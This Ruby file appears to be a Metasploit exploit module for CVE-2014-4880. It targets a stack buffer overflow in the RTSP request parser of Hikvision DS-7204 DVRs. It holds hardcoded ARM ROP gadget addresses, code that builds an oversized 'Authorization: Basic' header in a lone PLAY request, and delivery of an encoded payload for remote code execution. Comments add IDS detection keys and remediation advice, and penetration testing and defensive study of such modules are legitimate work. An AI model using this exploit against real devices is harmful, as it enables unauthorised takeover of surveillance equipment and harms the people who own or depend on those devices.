##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2014-4880: a stack buffer overflow in the
# RTSP request parser of Hikvision DVR appliances, reached through an
# oversized "Authorization: Basic" header carried in a single PLAY request.
#
# Only the DS-7204 (firmware V2.2.10 build 131009) is supported as a live
# target; a second "Debug Target" sends a cyclic pattern for exploit
# development rather than a working chain. The payload is ARMLE and the
# module is declared 'Privileged' => true, i.e. it expects the payload to run
# with elevated privileges on the device.
#
# Defender notes:
# - On the wire this is one TCP connection to RPORT (default 554) carrying a
#   lone "PLAY rtsp://<host>/ RTSP/1.0" request with no preceding OPTIONS /
#   DESCRIBE / SETUP exchange, whose Authorization header value is several
#   hundred bytes long (see #exploit). Both traits are usable detection keys
#   for RTSP-aware IDS/IPS rules.
# - Remediation is vendor firmware newer than the affected build; see the
#   Rapid7 advisory under 'References'. Exposing DVR RTSP (554/tcp) to
#   untrusted networks is the enabling condition.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Exploit::Remote::Tcp

  # Registers module metadata, targets and options with the framework.
  #
  # Each target entry carries a :callback symbol naming the instance method
  # that builds the target-specific ROP chain (dispatched from #exploit), plus
  # the gadget addresses that callback reads back via target[...]. The
  # addresses are absolute, which matches the "no PIE on libc" note above
  # #target_ds7204_1. The only registered option is RPORT, defaulting to the
  # standard RTSP port 554.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
        'Description' => %q{
          This module exploits a buffer overflow in the RTSP request parsing
          code of Hikvision DVR appliances. The Hikvision DVR devices record
          video feeds of surveillance cameras and offer remote administration
          and playback of recorded footage.

          The vulnerability is present in several models / firmware versions
          but due to the available test device this module only supports
          the DS-7204 model.
        },
        'Author' => [
          'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2014-4880' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]
        ],
        'Platform' => 'linux',
        'Arch' => ARCH_ARMLE,
        'Privileged' => true,
        'Targets' => [
          #
          # ROP targets are difficult to represent in the hash, use callbacks instead
          #
          [
            "DS-7204 Firmware V2.2.10 build 131009", {

              # The callback handles all target-specific settings
              :callback => :target_ds7204_1,
              # Gadget addresses below are consumed by #target_ds7204_1 and
              # #exploit; the assembly comments describe what each gadget does.
              'g_adjustesp' => 0x002c828c,
              # ADD SP, SP, #0x350
              # LDMFD SP!, {R4-R6,PC}

              'g_r3fromsp' => 0x00446f80,
              # ADD R3, SP, #0x60+var_58
              # BLX R6

              'g_blxr3_pop' => 0x00456360,
              # BLX R3
              # LDMFD SP!, {R1-R7,PC}

              'g_popr3' => 0x0000fe98,
              # LDMFD SP!, {R3,PC}
            }
          ],

          [
            "Debug Target", {

              # The callback handles all target-specific settings
              :callback => :target_debug

            }
          ]

        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2014-11-19',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(554)
      ]
    )
  end

  # Builds and sends the single malicious RTSP PLAY request.
  #
  # Flow: look up the selected target's :callback (refusing to run via
  # fail_with(Failure::NoTarget) when none is defined), let it produce the ROP
  # chain, then assemble the request as a fixed sequence of appends so that
  # every offset stays where the gadgets expect it: request line and CSeq,
  # the "Authorization: Basic " header name, 0x280 + 34 bytes of random
  # padding, the low three bytes of g_adjustesp (pack("V") is little-endian
  # and [0..2] drops the fourth byte, which for 0x002c828c is zero), the
  # header terminator, 19 more padding bytes, the ROP chain, 8 padding bytes
  # and finally the encoded payload.
  #
  # The request is written once and the socket is closed immediately; nothing
  # is read back, so success is only observable through the payload handler.
  def exploit
    unless self.respond_to?(target[:callback], true)
      fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
    end

    # Target-specific ROP chain (see #target_ds7204_1 / #target_debug)
    device_rop = self.send(target[:callback])

    request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
    request << "CSeq: 7\r\n"
    request << "Authorization: Basic "
    request << rand_text_alpha(0x280 + 34)
    # Only 3 of the 4 packed bytes are sent; the most-significant byte is 0x00
    request << [target["g_adjustesp"]].pack("V")[0..2]
    request << "\r\n\r\n"
    request << rand_text_alpha(19)

    # now append the ropchain
    request << device_rop
    request << rand_text_alpha(8)
    request << payload.encoded

    connect
    sock.put(request)
    disconnect
  end

  # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
  #
  # Builds the 24-byte ROP chain for the DS-7204 target. The layout sketched
  # in the CHAIN comment below is realised by overwriting three 4-byte slots
  # of a random buffer with little-endian ("V") gadget addresses read from the
  # target hash. The remaining slots (R4, R5 and the popped R3 in the sketch)
  # are left as random text rather than the zeroes shown in the sketch.
  #
  # @return [String] the 24-byte ROP chain
  def target_ds7204_1
    # Create a fixed-size buffer for the rop chain
    ropbuf = rand_text_alpha(24)

    # CHAIN = [
    # 0, #R4 pop adjustsp
    # 0, #R5 pop adjustsp
    # GADGET_BLXR3_POP, #R6 pop adjustsp
    # GADGET_POPR3,
    # 0, #R3 pop
    # GADGET_R3FROMSP,
    # ]

    ropbuf[8, 4] = [target["g_blxr3_pop"]].pack("V")
    ropbuf[12, 4] = [target["g_popr3"]].pack("V")
    ropbuf[20, 4] = [target["g_r3fromsp"]].pack("V")

    return ropbuf
  end

  # Generate a buffer that provides a starting point for exploit development
  #
  # Returns a 2000-byte Rex cyclic pattern in place of a ROP chain so that
  # offsets can be located from a crash; this target is not a working exploit
  # path.
  #
  # @return [String] 2000-byte pattern
  def target_debug
    Rex::Text.pattern_create(2000)
  end

  # Reads RHOST straight from the datastore. NOTE(review): this presumably
  # shadows the accessor provided by the Tcp mixin included above — confirm
  # the framework's RHOSTS handling still covers this module.
  #
  # @return [String, nil] the configured RHOST
  def rhost
    datastore['RHOST']
  end

  # Reads RPORT straight from the datastore (default 554 via register_options);
  # same shadowing caveat as #rhost.
  #
  # @return [Integer, nil] the configured RPORT
  def rport
    datastore['RPORT']
  end
end